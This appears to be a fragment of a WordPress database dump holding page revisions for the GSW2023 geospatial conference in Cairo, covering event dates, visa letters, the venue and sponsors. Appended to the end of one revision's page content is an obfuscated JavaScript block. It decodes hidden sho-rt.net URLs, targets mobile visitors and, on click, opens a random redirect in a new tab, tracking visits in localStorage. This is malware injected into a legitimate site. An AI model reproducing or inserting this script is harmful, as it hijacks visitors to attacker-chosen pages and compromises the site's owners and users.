css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 16:28:39','2023-06-25 16:28:39','',3066,'https://gsw2023.com/?p=4829',0,'revision','',0),
(4830,4,'2023-06-25 16:29:45','2023-06-25 16:29:45','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" 